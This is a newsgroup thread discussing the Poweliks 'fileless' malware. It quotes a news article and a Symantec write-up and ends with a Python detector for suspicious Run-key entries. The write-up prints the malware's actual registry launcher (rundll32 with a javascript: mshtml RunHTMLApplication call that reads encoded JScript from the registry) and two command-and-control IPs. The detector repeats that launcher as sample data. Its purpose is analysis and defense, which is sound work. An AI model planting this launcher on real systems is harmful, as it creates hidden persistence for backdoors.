Registry-infecting reboot-resisting malware has NO FILES - Page 3



Re: "Windows Calling a DLL Function" for Dummies




I use PE-Viewer to help get a library's function list.



I believe Wolf is doing a good job in getting the right clues.


Re: Registry-infecting reboot-resisting malware has NO FILES

David W. Hodgins expressed precisely:

Far be it from me to argue that the BIOS is not an OS under some
definition of OS, or that contiguous addresses containing code and data
aren't a file system under some definition of file system - or that a
hippopotamus is not an amphibian under some definition of amphibian.

I agree with you that the definition we should be using in the context  
of this discussion is the same one which the analysts were using in the  
original document which is being referenced in all of the FUD/fluff  
articles being bandied about. Files in the sense of what is created  
when you have the OS (Windows) create a file, is what I am calling a  
true file in this context.



Re: Registry-infecting reboot-resisting malware has NO FILES



To go further... When I examined a LoJack'd laptop a few years ago: the BIOS
is a big block of code; it has sections (option ROMs) that are just more
blocks of potentially executable code. It can be used to store a complete
Win32 PE executable (which is exactly what LoJack does). It doesn't have a
file allocation table, no file system of any sort... It runs from beginning
to end unless code stored inside tells it otherwise. The BIOS contains code
and data, and as far as the BIOS is concerned it's all the same stuff. lol.


  


--  
Take it easy... Don't let the sound of your own wheels drive you crazy.  
Lighten up while you still can. Don't even try to understand.  
Just find a place to make your stand and take it easy!


Re: Registry-infecting reboot-resisting malware has NO FILES

Dustin expressed precisely:

[...]


Conflating JS Encode with non-ASCII naming.


As has been mentioned many many many times before - it is essentially
'game over' when you allow a malware to execute on your machine. The
primary goal of AV/AM is to avoid such.


The author apparently misunderstands quite a bit.


Again, conflating the two separate issues.


Yep, it shouldn't be hard at all to find such in the registry. There is  
no legitimate reason for encoded JS in the registry AFAIK.

https://blog.gdatasoftware.com/blog/article/poweliks-the-persistent-malware-without-a-file.html



Re: Registry-infecting reboot-resisting malware has NO FILES


     "The JavaScript code checks whether Windows PowerShell, a
      command-line shell and scripting environment, is present
      on the system. If it isn’t, it downloads and installs it
      and then it decodes some more code that is actually a
      PowerShell script."

Does Powershell run on Win-98?

     "The malicious documents exploited a remote code execution
      vulnerability in Microsoft Office 2003, 2007 and 2010 that
      was patched by Microsoft in April 2012."

Did Office 2000 also have that vulnerability?

     "To block malware like Poweliks, “antivirus solutions have
      to either..."

Why can't (why doesn't) AV software monitor the registry for new startup
keys?

It shouldn't matter that it can't read the target being added to the key
(because of "non-standard" ASCII code) - what should matter is that it
detects changes (additions) to the startup registry keys.

=====================================

Stealthy, tricky 'Poweliks' malware hides in your system registry - but
not your hard drive

A new malware program called Poweliks attempts to evade detection and
analysis by running entirely from the system registry without creating
files on disk, security researchers warn.

The concept of “fileless” malware that only exists in the system’s
memory is not new, but such threats are rare because they typically
don’t survive across system reboots, when the memory is cleared. That’s
not the case for Poweliks, which takes a rather new approach to achieve
persistence while remaining fileless, according to malware researchers
from G Data Software.

When it infects a system, Poweliks creates a startup registry entry that
executes the legitimate rundll32.exe Windows file followed by some
encoded JavaScript code. This triggers a process similar in concept to a
Matryoshka Russian nesting doll, said Paul Rascagnères, senior threat
researcher at G Data, in a blog post.

The JavaScript code checks whether Windows PowerShell, a command-line
shell and scripting environment, is present on the system. If it isn’t,
it downloads and installs it and then it decodes some more code that is
actually a PowerShell script.

The PowerShell script is executed by using a trick to bypass a default
protection in Windows that prevents the launch of unknown PowerShell
scripts without user confirmation, Rascagnères said. The script then
decodes and executes shellcode which injects a DLL (dynamic link
library) directly into the system memory.

Once it is running in memory, the rogue DLL component connects to two IP
(Internet Protocol) addresses in Kazakhstan to receive commands. It can
be used to download and install other threats, depending on the
attacker’s needs and intentions.

During the entire process, from executing the JavaScript code to the
final DLL injection, the malware does not create any malicious files on
the hard disk drive, making it difficult for antivirus programs to
detect it.

Furthermore, the name of the startup registry key created by Poweliks is
a non-ASCII character. This is a trick that prevents regedit—the Windows
registry editor tool—and possibly other programs from displaying the
rogue start-up entry, making it difficult for both users and malware
analysts to manually spot the infection.

Some Poweliks variants have been distributed through malicious Microsoft
Word documents attached to spam emails that purported to come from
Canada Post or USPS. The malicious documents exploited a remote code
execution vulnerability in Microsoft Office 2003, 2007 and 2010 that was
patched by Microsoft in April 2012. However, according to other reports,
the malware is also distributed through drive-by download attacks that
use Web exploits.

To block malware like Poweliks, “antivirus solutions have to either
catch the file (the initial Word document) before it is executed (if
there is one), preferably before it reached the customer’s email inbox,”
Rascagnères said. “Or, as a next line of defense, they need to detect
the software exploit after the file’s execution, or, as a last step,
in-registry surveillance has to detect unusual behavior, block the
corresponding processes and alert the user.”

Security researchers from Trend Micro, who have also analyzed the
threat, believe that other malware creators may adopt the techniques
used by Poweliks in the future.

http://www.pcworld.com/article/2461120/stealthy-malware-poweliks-resides-only-in-system-registry.html

========================

So - Windows 98 is affected?

Symantec has actually verified that?

-------------------------
EarthLink Symantec Page
http://www.earthlink.net/software/nmpremium/norton/

Trojan.Poweliks
Risk Level 1: Very Low

Discovered:
    August 3, 2014
Updated:
    August 4, 2014 10:28:18 AM
Type:
    Trojan
Infection Length:
    71680 bytes
Systems Affected:
    Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows
NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP

SUMMARY
Trojan.Poweliks is a Trojan horse that performs malicious activities on
the compromised computer.

Antivirus Protection Dates

    * Initial Rapid Release version August 4, 2014 revision 001
    * Latest Rapid Release version August 4, 2014 revision 001
    * Initial Daily Certified version August 4, 2014 revision 008
    * Latest Daily Certified version August 4, 2014 revision 008
    * Initial Weekly Certified release date August 6, 2014

    * Wild Level: Low
    * Number of Infections: 0 - 49
    * Number of Sites: 0 - 2
    * Geographical Distribution: Low
    * Threat Containment: Easy
    * Removal: Easy

Damage

    * Damage Level: Medium
    * Payload: Opens a back door.

Distribution

    * Distribution Level: Low

TECHNICAL DETAILS
The Trojan may be dropped by Trojan.Mdropper.

When the Trojan is executed, it creates the following registry entries:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"(default)"
    = "[ENCRYPTED JAVASCRIPT]"

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"[NON-ASCII STRING]"
    = "rundll32.exe javascript:\"\..\mshtml,RunHTMLApplication\";document.write(\"<script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\software\microsoft\windows\currentversion\run\")+\"</script>\")"

The Trojan then checks if the compromised computer has the PowerShell or
.NET frameworks. If not, it will download the installers for these
frameworks from the official Microsoft website.

Next, the Trojan decrypts a PowerShell script from its encrypted
JavaScript. It runs this Powershell script to execute a binary program.
This program connects to the following remote locations:

    * 178.89.159.34
    * 178.89.159.35

http://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2014-080408-5614-99
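Virus Guy's point above (detect additions to the startup keys without needing to decode what they point at) and the two Run entries in the Symantec write-up lend themselves to a small check. The following is an added example, not code from the thread, Symantec or G Data: it diffs a constructed snapshot of HKCU Run values against a baseline and flags names regedit may not display and data that has the structure of the Poweliks launcher (rundll32 with a javascript: URL, mshtml/RunHTMLApplication, a JScript.Encode block, a RegRead back into the registry). The sample values, the zero-width-space name and the placeholder encoded body are constructed for illustration.

```python
import re

# Constructed sample of HKCU\...\Run values (value name -> data), shaped after the
# Symantec write-up quoted above. The encoded script body is a placeholder, not
# real malware content; the hidden value name is a zero-width space chosen for
# illustration, not the character Poweliks actually used.
RUN_BASELINE = {
    "OneDrive": r'"C:\Users\me\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}
RUN_CURRENT = dict(RUN_BASELINE)
RUN_CURRENT["(default)"] = "#@~^PLACEHOLDER-ENCODED-JS==^#~@"
RUN_CURRENT["\u200b"] = (
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";'
    r'document.write("<script language=jscript.encode>"'
    r'+(new ActiveXObject("WScript.Shell")).RegRead('
    r'"HKCU\software\microsoft\windows\currentversion\run\")+"</script>")'
)

# Structural indicators of the Poweliks launcher. None of them requires decoding
# the payload, which is the point made in the thread.
SUSPICIOUS_DATA = [
    (re.compile(r"rundll32(\.exe)?\s+javascript:", re.I), "rundll32 with javascript: URL"),
    (re.compile(r"mshtml\s*,\s*RunHTMLApplication", re.I), "mshtml RunHTMLApplication"),
    (re.compile(r"jscript\.encode", re.I), "JScript.Encode script block"),
    (re.compile(r"\.RegRead\(", re.I), "reads further code back out of the registry"),
    (re.compile(r"^#@~\^"), "JScript.Encode (screnc) header"),
]


def audit_run_values(baseline, current):
    """Compare a Run-key snapshot against a baseline and return
    [(value_name, [reasons])] for entries that were added or changed, have a
    name regedit may not display, or carry a Poweliks-style launcher."""
    findings = []
    for name, data in current.items():
        reasons = []
        if name not in baseline:
            reasons.append("added since baseline")
        elif baseline[name] != data:
            reasons.append("changed since baseline")
        if not name.isascii() or not name.isprintable():
            reasons.append("name contains non-ASCII or non-printable characters")
        reasons += [why for pattern, why in SUSPICIOUS_DATA if pattern.search(data)]
        if reasons:
            findings.append((name, reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in audit_run_values(RUN_BASELINE, RUN_CURRENT):
        # repr() makes a hidden name visible on the console, e.g. '\u200b'
        print(f"{name!r}: {'; '.join(reasons)}")
```

On a live system the two dictionaries would be filled from the HKCU and HKLM Run/RunOnce keys at two points in time; the baseline diff catches the addition even if none of the content patterns match.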

Re: Registry-infecting reboot-resisting malware has NO FILES

Virus Guy wrote:

Quoting an article:


How do they think the malware stays persistent? Do they believe in the  
registry fairy?


